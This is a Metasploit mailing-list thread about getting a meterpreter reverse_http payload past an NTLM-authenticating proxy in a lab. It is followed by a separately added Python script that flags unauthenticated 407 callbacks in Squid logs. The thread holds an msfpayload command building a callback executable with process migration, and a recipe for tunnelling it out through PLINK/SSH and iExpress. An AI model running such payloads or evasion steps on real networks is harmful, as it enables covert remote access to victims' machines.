Metasploit mailing list archives

Re: meterpreter ntlm proxy bypass


From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 13 Apr 2012 23:29:16 +0300

When using a proxy with NTLM auth, every HTTP request will get 407'ed
first (i.e. denied access until further challenge-response action
takes place to make sure you have the correct creds). After
successfully finishing the challenge-response thing, *ANOTHER
IDENTICAL* HTTP request will be sent, but it will go through this time
(if I'm wrong, someone correct me).

Given this brief introduction, as far as I can remember reverse_http
does this using the WinInet API, which means it will take place
transparently and if the user can browse the internet
_without_being_asked_for_credentials_ , then reverse_http SHOULD be
able to connect back to the multi/handler even through the proxy
without a problem.

I am not a native English speaker myself and I always have problems
trying to let other people understand what I am trying to say...and I
got a feeling that you might be having the same issue :)

Please speak the universal language and attach the PCAP from the
client and handler sides, if that's fine, so we may help you better
solve your problem.

Sherif Eldeeb

On Fri, Apr 13, 2012 at 9:58 PM, audio audience <audience099 () gmail com> wrote:
Thanks for the answer.

First of all, can meterpreter access a basic authentication proxy?

Then, I changed my network lab.
I set up an MS TMG server and enabled integrated auth. If the computer is joined
to Active Directory, it can access the internet over TMG.

I ran the meterpreter reverse_http payload; meterpreter automatically connects to
the proxy IP and port and gets an HTTP request, but it doesn't complete NTLM auth,
and TMG blocked this request.

I saw the meterpreter traffic via Wireshark; MS TMG blocked meterpreter's
HTTP traffic:
GET http://x.y.z.t/8YyR HTTP/1.0
Host: x.y.z.t
Pragma: no-cache

HTTP/1.1 407 Proxy Authentication Required ( Forefront TMG requires
authorization to fulfill the request. Access to the Web Proxy filter is
denied.  )
Via: 1.1 WIN-1ADVF
Proxy-Authenticate: Negotiate
Proxy-Authenticate: Kerberos
Proxy-Authenticate: NTLM
Proxy-Authenticate: Digest
qop="auth",algorithm=MD5-sess,nonce="+Upgraded+xh2sa123da14de32b881d8f64c125075a269ad11f1acd019f21333a41c0025df240d348959c41028a80443ef67b52380888306094e49f99",charset=utf-8,realm="xyz.com"
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 4128

Do you have any idea on this subject ...

2012/4/11 Sherif El-Deeb <archeldeeb () gmail com>

If the logged in user already is a member of the domain, is allowed
internet access and the machine is joined to the domain, then
reverse_http SHOULD go through the system configured proxy even with
NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that
criteria already, try setting the LPORT at the multi/handler to 80,
since that might be the only port allowed).

However, if the logged in user is not allowed internet connection, or
the machine is not a member of the domain (i.e. every time you connect
to the internet it pops up asking for creds), you have to have the
following:

1- You have to know the username, password and domain of an
allowed-internet user.
2- the Proxy IP and port
3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware"
program to tunnel through the connection for you, a
tested-and-guaranteed example would be (SSH server listening on 443) +
(PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1)
+ (some command-line kung-fu to add the host SSH key and glue
everything together) + iExpress.

As far as I know, there's nothing built-in that allows you to specify
a username, pass, domain and the proxy:port to meterpreter :)

I think I'll write a blog post about this someday :) but please beware
that you have to know lots of things in advance to make this work.

Sherif Eldeeb

On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:
Hello Everyone,

I want to bypass an NTLM-supported proxy with meterpreter.
I tested it in my lab; all outgoing traffic is blocked by the firewall for
the client. If the client wants to access the internet, it needs to set a Windows
username and password for the NTLM auth proxy.

I created the meterpreter payload with the following options:
# msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode;
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     x.y.z.t    yes       The local listener hostname
   LPORT     8080             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started HTTP reverse handler on http://x.y.z.t:8080/
[*] Starting the payload handler...


And then I ran 8.exe on the victim computer, but the proxy blocked the meterpreter
HTTP connection, because meterpreter didn't complete NTLM auth.
Squid log:
1334171617.857      0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html

How can I bypass NTLM auth with the meterpreter payload?

Thanks for your support

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
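As an added example that is not part of this thread: a small Python script that parses Squid access-log lines in the native format quoted above and flags clients that keep receiving TCP_DENIED/407 without ever presenting credentials, which is the proxy-side trace a callback that never answers the Proxy-Authenticate challenge leaves behind. The log lines, addresses and the username "jdoe" are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample Squid access.log lines (native format), modelled on the
# single TCP_DENIED/407 line quoted in the thread; addresses are placeholders.
SAMPLE_LOG = """\
1334171617.857      0 10.0.0.5 TCP_DENIED/407 1744 GET http://203.0.113.10:8080/l2eY - NONE/- text/html
1334171618.102      0 10.0.0.5 TCP_DENIED/407 1744 GET http://203.0.113.10:8080/l2eY - NONE/- text/html
1334171619.410      0 10.0.0.5 TCP_DENIED/407 1744 GET http://203.0.113.10:8080/l2eY - NONE/- text/html
1334171620.003      0 10.0.0.5 TCP_DENIED/407 1744 GET http://203.0.113.10:8080/l2eY - NONE/- text/html
1334171621.557      0 10.0.0.7 TCP_DENIED/407 1744 GET http://www.example.com/ - NONE/- text/html
1334171621.890    120 10.0.0.7 TCP_MISS/200 5120 GET http://www.example.com/ jdoe HIER_DIRECT/198.51.100.20 text/html
"""

# Squid native format: timestamp elapsed client code/status bytes method URL user hierarchy/peer type
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<hier>\S+)\s+(?P<type>\S+)$"
)

def parse_line(line):
    """Fields of one native-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def find_unauthenticated_clients(log_text, threshold=3):
    """Return {client: {"denied": n, "urls": set}} for clients that collect at
    least `threshold` 407s with no username and never complete proxy auth."""
    denied = defaultdict(lambda: {"denied": 0, "urls": set()})
    authenticated = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # 407 with user "-": the client never answered the Proxy-Authenticate challenge
        if rec["status"] == "407" and rec["user"] == "-":
            denied[rec["client"]]["denied"] += 1
            denied[rec["client"]]["urls"].add(rec["url"])
        # a 2xx/3xx carrying a username shows this client does complete auth normally
        elif rec["user"] != "-" and rec["status"][0] in "23":
            authenticated.add(rec["client"])
    return {ip: info for ip, info in denied.items()
            if info["denied"] >= threshold and ip not in authenticated}

if __name__ == "__main__":
    for ip, info in find_unauthenticated_clients(SAMPLE_LOG).items():
        print(f"{ip}: {info['denied']} x 407 with no credentials, urls={sorted(info['urls'])}")
```

A browser behind the same proxy produces a 407 followed by an authenticated request for the same URL, so the 10.0.0.7 pattern is the benign baseline and only the client that never authenticates is reported.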